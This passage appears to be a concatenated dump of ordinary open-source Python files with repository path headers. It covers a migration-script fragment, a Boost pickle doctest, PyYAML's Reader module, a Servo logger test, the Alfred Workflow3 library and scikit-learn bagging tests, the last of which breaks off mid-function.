# For instance: 2.postgres.upgrade.sql ->
# 002_postgres_upgrade.sql
tgtfile = '%s/%03d_%s_%s.sql' % (
versions, int(version), dbms, operation)
move_file(origfile, tgtfile)
# Move Python upgrade script.
pyfile = '%s.py' % dirname
pyfilepath = '%s/%s' % (origdir, pyfile)
if os.path.exists(pyfilepath):
tgtfile = '%s/%03d.py' % (versions, int(dirname))
move_file(pyfilepath, tgtfile)
# Try to remove directory. Will fail if it's not empty.
delete_directory(origdir)
def main():
"""Main function to be called when using this script."""
if len(sys.argv) != 2:
usage()
migrate_repository(sys.argv[1])
if __name__ == '__main__':
main()
|
Maccimo/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleDictConstructorCall.py
|
31
|
'%(foo)d %(bar)s' % dict(foo=.25, bar='spam'.upper())
|
cris-iisc/mpc-primitives
|
refs/heads/master
|
crislib/libscapi/lib/boost_1_64_0/libs/python/test/pickle4.py
|
20
|
# Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
r'''>>> import pickle4_ext
>>> import pickle
>>> def world_getinitargs(self):
... return (self.get_country(),)
>>> pickle4_ext.world.__getinitargs__ = world_getinitargs
>>> pickle4_ext.world.__module__
'pickle4_ext'
>>> pickle4_ext.world.__safe_for_unpickling__
1
>>> pickle4_ext.world.__name__
'world'
>>> pickle4_ext.world('Hello').__reduce__()
(<class 'pickle4_ext.world'>, ('Hello',))
>>> wd = pickle4_ext.world('California')
>>> pstr = pickle.dumps(wd)
>>> wl = pickle.loads(pstr)
>>> print(wd.greet())
Hello from California!
>>> print(wl.greet())
Hello from California!
'''
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print("running...")
import sys
status = run()[0]
if (status == 0): print("Done.")
sys.exit(status)
|
dimagol/trex-core
|
refs/heads/master
|
scripts/external_libs/pyyaml-3.11/python3/yaml/reader.py
|
272
|
# This module contains abstractions for the input stream. You don't have to
# looks further, there are no pretty code.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position to `length` characters.
# reader.index - the number of the current character.
# reader.line, stream.column - the line and the column of the current character.
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
def __init__(self, name, position, character, encoding, reason):
self.name = name
self.character = character
self.position = position
self.encoding = encoding
self.reason = reason
def __str__(self):
if isinstance(self.character, bytes):
return "'%s' codec can't decode byte #x%02x: %s\n" \
" in \"%s\", position %d" \
% (self.encoding, ord(self.character), self.reason,
self.name, self.position)
else:
return "unacceptable character #x%04x: %s\n" \
" in \"%s\", position %d" \
% (self.character, self.reason,
self.name, self.position)
class Reader(object):
# Reader:
# - determines the data encoding and converts it to a unicode string,
# - checks if characters are in allowed range,
# - adds '\0' to the end.
# Reader accepts
# - a `bytes` object,
# - a `str` object,
# - a file-like object with its `read` method returning `str`,
# - a file-like object with its `read` method returning `unicode`.
# Yeah, it's ugly and slow.
def __init__(self, stream):
self.name = None
self.stream = None
self.stream_pointer = 0
self.eof = True
self.buffer = ''
self.pointer = 0
self.raw_buffer = None
self.raw_decode = None
self.encoding = None
self.index = 0
self.line = 0
self.column = 0
if isinstance(stream, str):
self.name = "<unicode string>"
self.check_printable(stream)
self.buffer = stream+'\0'
elif isinstance(stream, bytes):
self.name = "<byte string>"
self.raw_buffer = stream
self.determine_encoding()
else:
self.stream = stream
self.name = getattr(stream, 'name', "<file>")
self.eof = False
self.raw_buffer = None
self.determine_encoding()
def peek(self, index=0):
try:
return self.buffer[self.pointer+index]
except IndexError:
self.update(index+1)
return self.buffer[self.pointer+index]
def prefix(self, length=1):
if self.pointer+length >= len(self.buffer):
self.update(length)
return self.buffer[self.pointer:self.pointer+length]
def forward(self, length=1):
if self.pointer+length+1 >= len(self.buffer):
self.update(length+1)
while length:
ch = self.buffer[self.pointer]
self.pointer += 1
self.index += 1
if ch in '\n\x85\u2028\u2029' \
or (ch == '\r' and self.buffer[self.pointer] != '\n'):
self.line += 1
self.column = 0
elif ch != '\uFEFF':
self.column += 1
length -= 1
def get_mark(self):
if self.stream is None:
return Mark(self.name, self.index, self.line, self.column,
self.buffer, self.pointer)
else:
return Mark(self.name, self.index, self.line, self.column,
None, None)
def determine_encoding(self):
while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
self.update_raw()
if isinstance(self.raw_buffer, bytes):
if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
self.raw_decode = codecs.utf_16_le_decode
self.encoding = 'utf-16-le'
elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
self.raw_decode = codecs.utf_16_be_decode
self.encoding = 'utf-16-be'
else:
self.raw_decode = codecs.utf_8_decode
self.encoding = 'utf-8'
self.update(1)
NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD]')
def check_printable(self, data):
match = self.NON_PRINTABLE.search(data)
if match:
character = match.group()
position = self.index+(len(self.buffer)-self.pointer)+match.start()
raise ReaderError(self.name, position, ord(character),
'unicode', "special characters are not allowed")
def update(self, length):
if self.raw_buffer is None:
return
self.buffer = self.buffer[self.pointer:]
self.pointer = 0
while len(self.buffer) < length:
if not self.eof:
self.update_raw()
if self.raw_decode is not None:
try:
data, converted = self.raw_decode(self.raw_buffer,
'strict', self.eof)
except UnicodeDecodeError as exc:
character = self.raw_buffer[exc.start]
if self.stream is not None:
position = self.stream_pointer-len(self.raw_buffer)+exc.start
else:
position = exc.start
raise ReaderError(self.name, position, character,
exc.encoding, exc.reason)
else:
data = self.raw_buffer
converted = len(data)
self.check_printable(data)
self.buffer += data
self.raw_buffer = self.raw_buffer[converted:]
if self.eof:
self.buffer += '\0'
self.raw_buffer = None
break
def update_raw(self, size=4096):
data = self.stream.read(size)
if self.raw_buffer is None:
self.raw_buffer = data
else:
self.raw_buffer += data
self.stream_pointer += len(data)
if not data:
self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
|
dzbarsky/servo
|
refs/heads/master
|
python/mach/mach/test/test_logger.py
|
128
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, unicode_literals
import logging
import time
import unittest
from mach.logging import StructuredHumanFormatter
from mozunit import main
class DummyLogger(logging.Logger):
def __init__(self, cb):
logging.Logger.__init__(self, 'test')
self._cb = cb
def handle(self, record):
self._cb(record)
class TestStructuredHumanFormatter(unittest.TestCase):
def test_non_ascii_logging(self):
# Ensures the formatter doesn't choke when non-ASCII characters are
# present in printed parameters.
formatter = StructuredHumanFormatter(time.time())
def on_record(record):
result = formatter.format(record)
relevant = result[9:]
self.assertEqual(relevant, 'Test: s\xe9curit\xe9')
logger = DummyLogger(on_record)
value = 's\xe9curit\xe9'
logger.log(logging.INFO, 'Test: {utf}',
extra={'action': 'action', 'params': {'utf': value}})
if __name__ == '__main__':
main()
|
ggenikus/cld
|
refs/heads/master
|
src/libs/workflow/workflow3.py
|
3
|
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-06-25
#
"""
:class:`Workflow3` supports Alfred 3's new features.
It is an Alfred 3-only version of :class:`~workflow.workflow.Workflow`.
It supports setting :ref:`workflow-variables` and
:class:`the more advanced modifiers <Modifier>` supported by Alfred 3.
In order for the feedback mechanism to work correctly, it's important
to create :class:`Item3` and :class:`Modifier` objects via the
:meth:`Workflow3.add_item()` and :meth:`Item3.add_modifier()` methods
respectively. If you instantiate :class:`Item3` or :class:`Modifier`
objects directly, the current :class:`~workflow.workflow3.Workflow3`
object won't be aware of them, and they won't be sent to Alfred when
you call :meth:`~workflow.workflow3.Workflow3.send_feedback()`.
"""
from __future__ import print_function, unicode_literals, absolute_import
import json
import os
import sys
from .workflow import Workflow
class Variables(dict):
"""Workflow variables for Run Script actions.
.. versionadded: 1.26
This class allows you to set workflow variables from
Run Script actions.
It is a subclass of `dict`.
>>> v = Variables(username='deanishe', password='hunter2')
>>> v.arg = u'output value'
>>> print(v)
Attributes:
arg (unicode): Output value (``{query}``).
config (dict): Configuration for downstream workflow element.
"""
def __init__(self, arg=None, **variables):
"""Create a new `Variables` object.
Args:
arg (unicode, optional): Main output/``{query}``.
**variables: Workflow variables to set.
"""
self.arg = arg
self.config = {}
super(Variables, self).__init__(**variables)
@property
def obj(self):
"""Return ``alfredworkflow`` `dict`."""
o = {}
if self:
d2 = {}
for k, v in self.items():
d2[k] = v
o['variables'] = d2
if self.config:
o['config'] = self.config
if self.arg is not None:
o['arg'] = self.arg
return {'alfredworkflow': o}
def __unicode__(self):
"""Convert to ``alfredworkflow`` JSON object.
Returns:
unicode: ``alfredworkflow`` JSON object
"""
if not self and not self.config:
if self.arg:
return self.arg
else:
return u''
return json.dumps(self.obj)
def __str__(self):
"""Convert to ``alfredworkflow`` JSON object.
Returns:
str: UTF-8 encoded ``alfredworkflow`` JSON object
"""
return unicode(self).encode('utf-8')
class Modifier(object):
"""Modify ``Item3`` values for when specified modifier keys are pressed.
Valid modifiers (i.e. values for ``key``) are:
* cmd
* alt
* shift
* ctrl
* fn
Attributes:
arg (unicode): Arg to pass to following action.
key (unicode): Modifier key (see above).
subtitle (unicode): Override item subtitle.
valid (bool): Override item validity.
variables (dict): Workflow variables set by this modifier.
"""
def __init__(self, key, subtitle=None, arg=None, valid=None):
"""Create a new :class:`Modifier`.
You probably don't want to use this class directly, but rather
use :meth:`Item3.add_modifier()` to add modifiers to results.
Args:
key (unicode): Modifier key, e.g. ``"cmd"``, ``"alt"`` etc.
subtitle (unicode, optional): Override default subtitle.
arg (unicode, optional): Argument to pass for this modifier.
valid (bool, optional): Override item's validity.
"""
self.key = key
self.subtitle = subtitle
self.arg = arg
self.valid = valid
self.config = {}
self.variables = {}
def setvar(self, name, value):
"""Set a workflow variable for this Item.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
@property
def obj(self):
"""Modifier formatted for JSON serialization for Alfred 3.
Returns:
dict: Modifier for serializing to JSON.
"""
o = {}
if self.subtitle is not None:
o['subtitle'] = self.subtitle
if self.arg is not None:
o['arg'] = self.arg
if self.valid is not None:
o['valid'] = self.valid
# Variables and config
if self.variables or self.config:
d = {}
if self.variables:
d['variables'] = self.variables
if self.config:
d['config'] = self.config
if self.arg is not None:
d['arg'] = self.arg
o['arg'] = json.dumps({'alfredworkflow': d})
return o
class Item3(object):
"""Represents a feedback item for Alfred 3.
Generates Alfred-compliant JSON for a single item.
You probably shouldn't use this class directly, but via
:meth:`Workflow3.add_item`. See :meth:`~Workflow3.add_item`
for details of arguments.
"""
def __init__(self, title, subtitle='', arg=None, autocomplete=None,
valid=False, uid=None, icon=None, icontype=None,
type=None, largetext=None, copytext=None, quicklookurl=None):
"""Use same arguments as for :meth:`Workflow.add_item`.
Argument ``subtitle_modifiers`` is not supported.
"""
self.title = title
self.subtitle = subtitle
self.arg = arg
self.autocomplete = autocomplete
self.valid = valid
self.uid = uid
self.icon = icon
self.icontype = icontype
self.type = type
self.quicklookurl = quicklookurl
self.largetext = largetext
self.copytext = copytext
self.modifiers = {}
self.config = {}
self.variables = {}
def setvar(self, name, value):
"""Set a workflow variable for this Item.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
def add_modifier(self, key, subtitle=None, arg=None, valid=None):
"""Add alternative values for a modifier key.
Args:
key (unicode): Modifier key, e.g. ``"cmd"`` or ``"alt"``
subtitle (unicode, optional): Override item subtitle.
arg (unicode, optional): Input for following action.
valid (bool, optional): Override item validity.
Returns:
Modifier: Configured :class:`Modifier`.
"""
mod = Modifier(key, subtitle, arg, valid)
for k in self.variables:
mod.setvar(k, self.variables[k])
self.modifiers[key] = mod
return mod
@property
def obj(self):
"""Item formatted for JSON serialization.
Returns:
dict: Data suitable for Alfred 3 feedback.
"""
# Required values
o = {'title': self.title,
'subtitle': self.subtitle,
'valid': self.valid}
icon = {}
# Optional values
# arg & variables
v = Variables(self.arg, **self.variables)
v.config = self.config
arg = unicode(v)
if arg:
o['arg'] = arg
if self.autocomplete is not None:
o['autocomplete'] = self.autocomplete
if self.uid is not None:
o['uid'] = self.uid
if self.type is not None:
o['type'] = self.type
if self.quicklookurl is not None:
o['quicklookurl'] = self.quicklookurl
# Largetype and copytext
text = self._text()
if text:
o['text'] = text
icon = self._icon()
if icon:
o['icon'] = icon
# Modifiers
mods = self._modifiers()
if mods:
o['mods'] = mods
return o
def _icon(self):
"""Return `icon` object for item.
Returns:
dict: Mapping for item `icon` (may be empty).
"""
icon = {}
if self.icon is not None:
icon['path'] = self.icon
if self.icontype is not None:
icon['type'] = self.icontype
return icon
def _text(self):
"""Return `largetext` and `copytext` object for item.
Returns:
dict: `text` mapping (may be empty)
"""
text = {}
if self.largetext is not None:
text['largetype'] = self.largetext
if self.copytext is not None:
text['copy'] = self.copytext
return text
def _modifiers(self):
"""Build `mods` dictionary for JSON feedback.
Returns:
dict: Modifier mapping or `None`.
"""
if self.modifiers:
mods = {}
for k, mod in self.modifiers.items():
mods[k] = mod.obj
return mods
return None
class Workflow3(Workflow):
"""Workflow class that generates Alfred 3 feedback.
Attributes:
item_class (class): Class used to generate feedback items.
variables (dict): Top level workflow variables.
"""
item_class = Item3
def __init__(self, **kwargs):
"""Create a new :class:`Workflow3` object.
See :class:`~workflow.workflow.Workflow` for documentation.
"""
Workflow.__init__(self, **kwargs)
self.variables = {}
self._rerun = 0
self._session_id = None
@property
def _default_cachedir(self):
"""Alfred 3's default cache directory."""
return os.path.join(
os.path.expanduser(
'~/Library/Caches/com.runningwithcrayons.Alfred-3/'
'Workflow Data/'),
self.bundleid)
@property
def _default_datadir(self):
"""Alfred 3's default data directory."""
return os.path.join(os.path.expanduser(
'~/Library/Application Support/Alfred 3/Workflow Data/'),
self.bundleid)
@property
def rerun(self):
"""How often (in seconds) Alfred should re-run the Script Filter."""
return self._rerun
@rerun.setter
def rerun(self, seconds):
"""Interval at which Alfred should re-run the Script Filter.
Args:
seconds (int): Interval between runs.
"""
self._rerun = seconds
@property
def session_id(self):
"""A unique session ID every time the user uses the workflow.
.. versionadded:: 1.25
The session ID persists while the user is using this workflow.
It expires when the user runs a different workflow or closes
Alfred.
"""
if not self._session_id:
sid = os.getenv('_WF_SESSION_ID')
if not sid:
from uuid import uuid4
sid = uuid4().hex
self.setvar('_WF_SESSION_ID', sid)
self._session_id = sid
return self._session_id
def setvar(self, name, value):
"""Set a "global" workflow variable.
These variables are always passed to downstream workflow objects.
If you have set :attr:`rerun`, these variables are also passed
back to the script when Alfred runs it again.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
def add_item(self, title, subtitle='', arg=None, autocomplete=None,
valid=False, uid=None, icon=None, icontype=None,
type=None, largetext=None, copytext=None, quicklookurl=None):
"""Add an item to be output to Alfred.
See :meth:`~workflow.workflow.Workflow.add_item` for the main
documentation.
The key difference is that this method does not support the
``modifier_subtitles`` argument. Use the :meth:`~Item3.add_modifier()`
method instead on the returned item instead.
Returns:
Item3: Alfred feedback item.
"""
item = self.item_class(title, subtitle, arg,
autocomplete, valid, uid, icon, icontype, type,
largetext, copytext, quicklookurl)
self._items.append(item)
return item
def _mk_session_name(self, name):
"""New cache name/key based on session ID."""
return '_wfsess-{0}-{1}'.format(self.session_id, name)
def cache_data(self, name, data, session=False):
"""Cache API with session-scoped expiry.
.. versionadded:: 1.25
Args:
name (str): Cache key
data (object): Data to cache
session (bool, optional): Whether to scope the cache
to the current session.
``name`` and ``data`` are as for the
:meth:`~workflow.workflow.Workflow.cache_data` on
:class:`~workflow.workflow.Workflow`.
If ``session`` is ``True``, the ``name`` variable is prefixed
with :attr:`session_id`.
"""
if session:
name = self._mk_session_name(name)
return super(Workflow3, self).cache_data(name, data)
def cached_data(self, name, data_func=None, max_age=60, session=False):
"""Cache API with session-scoped expiry.
.. versionadded:: 1.25
Args:
name (str): Cache key
data_func (callable): Callable that returns fresh data. It
is called if the cache has expired or doesn't exist.
max_age (int): Maximum allowable age of cache in seconds.
session (bool, optional): Whether to scope the cache
to the current session.
``name``, ``data_func`` and ``max_age`` are as for the
:meth:`~workflow.workflow.Workflow.cached_data` on
:class:`~workflow.workflow.Workflow`.
If ``session`` is ``True``, the ``name`` variable is prefixed
with :attr:`session_id`.
"""
if session:
name = self._mk_session_name(name)
return super(Workflow3, self).cached_data(name, data_func, max_age)
def clear_session_cache(self):
"""Remove *all* session data from the cache.
.. versionadded:: 1.25
"""
def _is_session_file(filename):
return filename.startswith('_wfsess-')
self.clear_cache(_is_session_file)
@property
def obj(self):
"""Feedback formatted for JSON serialization.
Returns:
dict: Data suitable for Alfred 3 feedback.
"""
items = []
for item in self._items:
items.append(item.obj)
o = {'items': items}
if self.variables:
o['variables'] = self.variables
if self.rerun:
o['rerun'] = self.rerun
return o
def send_feedback(self):
"""Print stored items to console/Alfred as JSON."""
json.dump(self.obj, sys.stdout)
sys.stdout.flush()
|
nikitasingh981/scikit-learn
|
refs/heads/master
|
sklearn/ensemble/tests/test_bagging.py
|
43
|
"""
Testing for the bagging ensemble module (sklearn.ensemble.bagging).
"""
# Author: Gilles Louppe
# License: BSD 3 clause
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_warns_message
from sklearn.dummy import DummyClassifier, DummyRegressor
from sklearn.model_selection import GridSearchCV, ParameterGrid
from sklearn.ensemble import BaggingClassifier, BaggingRegressor
from sklearn.linear_model import Perceptron, LogisticRegression
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.svm import SVC, SVR
from sklearn.pipeline import make_pipeline
from sklearn.feature_selection import SelectKBest
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston, load_iris, make_hastie_10_2
from sklearn.utils import check_random_state
from scipy.sparse import csc_matrix, csr_matrix
rng = check_random_state(0)
# also load the iris dataset
# and randomly permute it
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification():
# Check classification for various parameter settings.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
grid = ParameterGrid({"max_samples": [0.5, 1.0],
"max_features": [1, 2, 4],
"bootstrap": [True, False],
"bootstrap_features": [True, False]})
for base_estimator in [None,
DummyClassifier(),
Perceptron(),
DecisionTreeClassifier(),
KNeighborsClassifier(),
SVC()]:
for params in grid:
BaggingClassifier(base_estimator=base_estimator,
random_state=rng,
**params).fit(X_train, y_train).predict(X_test)
def test_sparse_classification():
# Check classification for various parameter settings on sparse input.
class CustomSVC(SVC):
"""SVC variant that records the nature of the training set"""
def fit(self, X, y):
super(CustomSVC, self).fit(X, y)
self.data_type_ = type(X)
return self
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
parameter_sets = [
{"max_samples": 0.5,
"max_features": 2,
"bootstrap": True,
"bootstrap_features": True},
{"max_samples": 1.0,
"max_features": 4,
"bootstrap": True,
"bootstrap_features": True},
{"max_features": 2,
"bootstrap": False,
"bootstrap_features": True},
{"max_samples": 0.5,
"bootstrap": True,
"bootstrap_features": False},
]
for sparse_format in [csc_matrix, csr_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
for params in parameter_sets:
for f in ['predict', 'predict_proba', 'predict_log_proba', 'decision_function']:
# Trained on sparse format
sparse_classifier = BaggingClassifier(
base_estimator=CustomSVC(decision_function_shape='ovr'),
random_state=1,
**params
).fit(X_train_sparse, y_train)
sparse_results = getattr(sparse_classifier, f)(X_test_sparse)
# Trained on dense format
dense_classifier = BaggingClassifier(
base_estimator=CustomSVC(decision_function_shape='ovr'),
random_state=1,
**params
).fit(X_train, y_train)
dense_results = getattr(dense_classifier, f)(X_test)
assert_array_equal(sparse_results, dense_results)
sparse_type = type(X_train_sparse)
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([t == sparse_type for t in types])
def test_regression():
# Check regression for various parameter settings.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
boston.target[:50],
random_state=rng)
grid = ParameterGrid({"max_samples": [0.5, 1.0],
"max_features": [0.5, 1.0],
"bootstrap": [True, False],
"bootstrap_features": [True, False]})
for base_estimator in [None,
DummyRegressor(),
DecisionTreeRegressor(),
KNeighborsRegressor(),
SVR()]:
for params in grid:
BaggingRegressor(base_estimator=base_estimator,
random_state=rng,
**params).fit(X_train, y_train).predict(X_test)
def test_sparse_regression():
# Check regression for various parameter settings on sparse input.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
boston.target[:50],
random_state=rng)
class CustomSVR(SVR):
"""SVC variant that records the nature of the training set"""
def fit(self, X, y):
super(CustomSVR, self).fit(X, y)
self.data_type_ = type(X)
return self
parameter_sets = [
{"max_samples": 0.5,
"max_features": 2,
"bootstrap": True,
"bootstrap_features": True},
{"max_samples": 1.0,
"max_features": 4,
"bootstrap": True,
"bootstrap_features": True},
{"max_features": 2,
"bootstrap": False,
"bootstrap_features": True},
{"max_samples": 0.5,
"bootstrap": True,
"bootstrap_features": False},
]
for sparse_format in [csc_matrix, csr_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
for params in parameter_sets:
# Trained on sparse format
sparse_classifier = BaggingRegressor(
base_estimator=CustomSVR(),
random_state=1,
**params
).fit(X_train_sparse, y_train)
sparse_results = sparse_classifier.predict(X_test_sparse)
# Trained on dense format
dense_results = BaggingRegressor(
base_estimator=CustomSVR(),
random_state=1,
**params
).fit(X_train, y_train).predict(X_test)
sparse_type = type(X_train_sparse)
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert_array_equal(sparse_results, dense_results)
assert all([t == sparse_type for t in types])
assert_array_equal(sparse_results, dense_results)
def test_bootstrap_samples():
# Test that bootstrapping samples generate non-perfect base estimators.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
base_estimator = DecisionTreeRegressor().fit(X_train, y_train)
# without bootstrap, all trees are perfect on the training set
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_samples=1.0,
bootstrap=False,
random_state=rng).fit(X_train, y_train)
assert_equal(base_estimator.score(X_train, y_train),
ensemble.score(X_train, y_train))
# with bootstrap, trees are no longer perfect on the training set
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_samples=1.0,
bootstrap=True,
random_state=rng).fit(X_train, y_train)
assert_greater(base_estimator.score(X_train, y_train),
ensemble.score(X_train, y_train))
def test_bootstrap_features():
# Test that bootstrapping features may generate duplicate features.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_features=1.0,
bootstrap_features=False,
random_state=rng).fit(X_train, y_train)
for features in ensemble.estimators_features_:
assert_equal(boston.data.shape[1], np.unique(features).shape[0])
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_features=1.0,
bootstrap_features=True,
random_state=rng).fit(X_train, y_train)
for features in ensemble.estimators_features_:
assert_greater(boston.data.shape[1], np.unique(features).shape[0])
def test_probability():
# Predict probabilities.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
with np.errstate(divide="ignore", invalid="ignore"):
# Normal case
ensemble = BaggingClassifier(base_estimator=DecisionTreeClassifier(),
random_state=rng).fit(X_train, y_train)
assert_array_almost_equal(np.sum(ensemble.predict_proba(X_test),
axis=1),
np.ones(len(X_test)))
assert_array_almost_equal(ensemble.predict_proba(X_test),
np.exp(ensemble.predict_log_proba(X_test)))
# Degenerate case, where some classes are missing
ensemble = BaggingClassifier(base_estimator=LogisticRegression(),
random_state=rng,
max_samples=5).fit(X_train, y_train)
assert_array_almost_equal(np.sum(ensemble.predict_proba(X_test),
axis=1),
np.ones(len(X_test)))
assert_array_almost_equal(ensemble.predict_proba(X_test),
np.exp(ensemble.predict_log_proba(X_test)))
def test_oob_score_classification():
# Check that oob prediction is a good estimation of the generalization
# error.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
for base_estimator in [DecisionTreeClassifier(), SVC()]:
clf = BaggingClassifier(base_estimator=base_estimator,
n_estimators=100,
bootstrap=True,
oob_score=True,
random_state=rng).fit(X_train, y_train)
test_score = clf.score(X_test, y_test)
assert_less(abs(test_score - clf.oob_score_), 0.1)
# Test with few estimators
assert_warns(UserWarning,
BaggingClassifier(base_estimator=base_estimator,
n_estimators=1,
bootstrap=True,
oob_score=True,
random_state=rng).fit,
X_train,
y_train)
def test_oob_score_regression():
# Check that oob prediction is a good estimation of the generalization
# error.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
clf = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
n_estimators=50,
bootstrap=True,
oob_score=True,
random_state=rng).fit(X_train, y_train)
test_score = clf.score(X_test, y_test)
assert_less(abs(test_score - clf.oob_score_), 0.1)
# Test with few estimators
assert_warns(UserWarning,
BaggingRegressor(base_estimator=DecisionTreeRegressor(),
n_estimators=1,
bootstrap=True,
oob_score=True,
random_state=rng).fit,
X_train,
y_train)
def test_single_estimator():
# Check singleton ensembles.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
clf1 = BaggingRegressor(base_estimator=KNeighborsRegressor(),
n_estimators=1,
bootstrap=False,
bootstrap_features=False,
random_state=rng).fit(X_train, y_train)
clf2 = KNeighborsRegressor().fit(X_train, y_train)
assert_array_equal(clf1.predict(X_test), clf2.predict(X_test))
def test_error():
# Test that it gives proper exception on deficient input.
X, y = iris.data, iris.target
base = DecisionTreeClassifier()
# Test max_samples
assert_raises(ValueError,
BaggingClassifier(base, max_samples=-1).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=0.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=2.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=1000).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples="foobar").fit, X, y)
# Test max_features
assert_raises(ValueError,
BaggingClassifier(base, max_features=-1).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=0.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=2.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=5).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features="foobar").fit, X, y)
# Test support of decision_function
assert_false(hasattr(BaggingClassifier(base).fit(X, y), 'decision_function'))
def test_parallel_classification():
# Check parallel classification.
rng = check_random_state(0)
# Classification
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
# predict_proba
ensemble.set_params(n_jobs=1)
y1 = ensemble.predict_proba(X_test)
ensemble.set_params(n_jobs=2)
y2 = ensemble.predict_proba(X_test)
assert_array_almost_equal(y1, y2)
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=1,
random_state=0).fit(X_train, y_train)
y3 = ensemble.predict_proba(X_test)
assert_array_almost_equal(y1, y3)
# decision_function
ensemble = BaggingClassifier(SVC(decision_function_shape='ovr'),
n_jobs=3,
random_state=0).fit(X_train, y_train)
ensemble.set_params(n_jobs=1)
decisions1 = ensemble.decision_function(X_test)
ensemble.set_params(n_jobs=2)
decisions2 = ensemble.decision_function(X_test)
assert_array_almost_equal(decisions1, decisions2)
ensemble = BaggingClassifier(SVC(decision_function_shape='ovr'),
n_jobs=1,
random_state=0).fit(X_train, y_train)
